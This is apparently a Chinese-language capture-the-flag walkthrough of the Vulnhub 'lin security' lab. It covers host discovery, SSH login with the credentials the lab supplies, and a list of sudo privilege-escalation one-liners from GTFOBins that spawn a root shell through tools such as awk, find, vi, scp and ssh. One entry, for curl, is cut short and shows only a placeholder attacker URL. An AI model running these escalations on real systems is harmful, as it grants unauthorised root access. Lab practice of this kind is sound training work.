Vulnhub lin security靶场
一、主机发现
arp-scan -l
靶场描述提供了bob用户,密码为secret
二、使用ssh远程连接
ssh bob@192.168.121.173
三、sudo提权
sudo -l
利用三方网站https://gtfobins.github.io/
1.ash
sudo ash
2.awk
sudo awk 'BEGIN {system("/bin/sh")}'
3.bash
sudo bash
4.csh
sudo csh
5.dash
sudo dash
6.curl
URL=http://attacker.com/file_to_get
7.ed
sudo ed !/bin/sh
8.env
sudo env /bin/sh
9.expect
sudo expect -c 'spawn /bin/sh;interact'
10.find
sudo find . -exec /bin/sh \; -quit
11.ftp
sudo ftp !/bin/sh
12.less
sudo less /etc/profile !/bin/sh
13.man
sudo man man !/bin/sh
14.more
TERM= sudo more /etc/profile !/bin/sh
15.scp
TF=$(mktemp) echo 'sh 0<&2 1>&2' > $TF chmod +x "$TF" sudo scp -S $TF x y:
16.socat
sudo socat stdin exec:/bin/sh
17.ssh
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
18.vi
sudo vi -c ':!/bin/sh' /dev/null
19.zsh
sudo zsh
20.pico
sudo pico ^R^X #依次Ctrl+R、Ctrl+X reset; sh 1>&0 2>&0
21.perl
sudo perl -e 'exec "/bin/sh";'
22.tclsh
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
23.script
sudo script -q /dev/null